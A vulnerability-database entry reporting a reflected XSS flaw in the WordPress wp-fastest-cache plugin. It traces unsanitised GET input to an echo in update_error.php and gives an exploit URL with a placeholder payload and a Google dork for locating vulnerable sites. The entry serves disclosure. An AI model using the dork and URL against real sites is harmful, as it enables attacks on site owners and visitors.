Lucene search
+L

Wordpress Fastest Cache plugin XSS Vulnerability

🗓️ 01 Dec 2015 00:00:00Reported by sniper.tType 
zdt
 zdt
🔗 0day.today👁 26 Views

Wordpress plugin wp-fastest-cache XSS Vulnerability version 0.8.5.

Code
######################################################################
# Exploit Title: Wordpress plugin wp-fastest-cache  XSS Vulnerability
# Software Link: https://wordpress.org/plugins/wp-fastest-cache/
#Version:0.8.5.5
# Google dork: inurl:/wp-content/plugins/wp-fastest-cache
######################################################################
 
 The code in ./wp-fastest-cache/templates/update_error.php
 

        34: echo echo $error_message; 
        8: $error_message = strip_tags($error_message); 
            7: $error_message = str_replace(array("\"", "'"), "", $error_message); 
                6: $error_message = $_GET['error_message']; 

 
 
Exploit
http://server/wp-content/plugins/wp-fastest-cache/templates/update_error.php?error_message=/*XSS_HERE*/


#  0day.today [2018-04-14]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation